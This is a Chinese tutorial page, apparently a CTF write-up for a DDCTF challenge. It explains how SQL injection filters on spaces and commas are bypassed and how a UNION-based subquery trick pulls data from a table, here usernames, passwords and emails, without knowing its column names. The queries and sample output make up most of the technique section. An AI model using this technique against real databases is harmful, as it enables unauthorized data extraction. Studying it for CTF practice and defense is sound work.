脚本之家 服务器常用软件
快捷导航
您的位置:首页数据库Mysql → Mysql绕过未知字段名

Mysql如何巧妙的绕过未知字段名详解

 更新时间:2017年05月31日 08:39:56   投稿:daisy  
这篇文章主要给大家介绍了Mysql如何巧妙的绕过未知字段名的相关资料,文中给出了详细的示例代码供大家参考学习,对学习mysql具有一定的参考学习价值,需要的朋友们下面来一起看看吧。

前言

本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:

实现思路

题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;

存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:

思想就是获取flag,让其在已知字段名下出现;

示例代码:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对脚本之家的支持。

您可能感兴趣的文章:

相关文章

  • MySQL where和having的异同

    MySQL where和having的异同

    我们在进行查询的时候,经常需要按照条件对查询结果进行筛选,这就要用到条件语句where和having了,本文主要介绍了MySQL where和having的异同,具有一定的参考价值,感兴趣的可以了解一下
    2024-02-02
  • MySQL8自增主键变化图文详解

    MySQL8自增主键变化图文详解

    众所周知MySQL 的主键可以是自增的,下面这篇文章主要给大家介绍了关于MySQL8自增主键变化的相关资料,文中通过示例代码介绍的非常详细,需要的朋友可以参考下
    2022-04-04
  • mysql 操作数据库基础详解

    mysql 操作数据库基础详解

    这篇文章主要介绍了mysql 操作数据库基础详解,MySQL是一种关系型数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性
    2022-08-08
  • MySql 缓存查询原理与缓存监控和索引监控介绍

    MySql 缓存查询原理与缓存监控和索引监控介绍

    这篇文章主要介绍了MySql 缓存查询原理与缓存监控和索引监控,需要的朋友可以参考下
    2021-07-07
  • MySQL数据库之索引详解

    MySQL数据库之索引详解

    大家好,本篇文章主要讲的是MySQL数据库之索引详解,感兴趣的同学赶快来看一看吧,对你有帮助的话记得收藏一下,方便下次浏览
    2021-12-12
  • mysql数据库基本语法及操作大全

    mysql数据库基本语法及操作大全

    这篇文章主要介绍了mysql数据库基本语法及操作大全,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2021-04-04
  • win32安装配置非安装版的MySQL

    win32安装配置非安装版的MySQL

    当前非安装版是从MySQL.com下载来的v5.1.40;下载下来的是一个ZIP压缩包,解压到C:\MySQL5.1.40目录,接下来,设置系统环境变量,好在CMD命令行下使用MySQL。
    2010-02-02
  • Mysql获取id最大值、表的记录总数等相关问题的方法汇总

    Mysql获取id最大值、表的记录总数等相关问题的方法汇总

    在做网站开发时,我们也许会想要取得mysql里id最大的一条记录,这个其实很简单。这篇文章给大家整理了获取一个表的记录数、获取一个表的最大id、获取一个表的auto_increment值等相关问题的答案,有需要的朋友们可以参考借鉴。
    2016-09-09
  • MySQL复合查询操作实战案例

    MySQL复合查询操作实战案例

    这篇文章主要给大家介绍了关于MySQL复合查询操作的相关资料,MySQL复合查询是指在一个SQL语句中使用多个查询条件,以过滤和检索数据,需要的朋友可以参考下
    2023-08-08
  • MySQL的字符串函数使用说明

    MySQL的字符串函数使用说明

    符串或串(String)是由零个或多个字符组成的有限序列。一般记为 s=’dreamflys’(n>=0)。它是编程语言中表示文本的数据类型
    2012-01-01

最新评论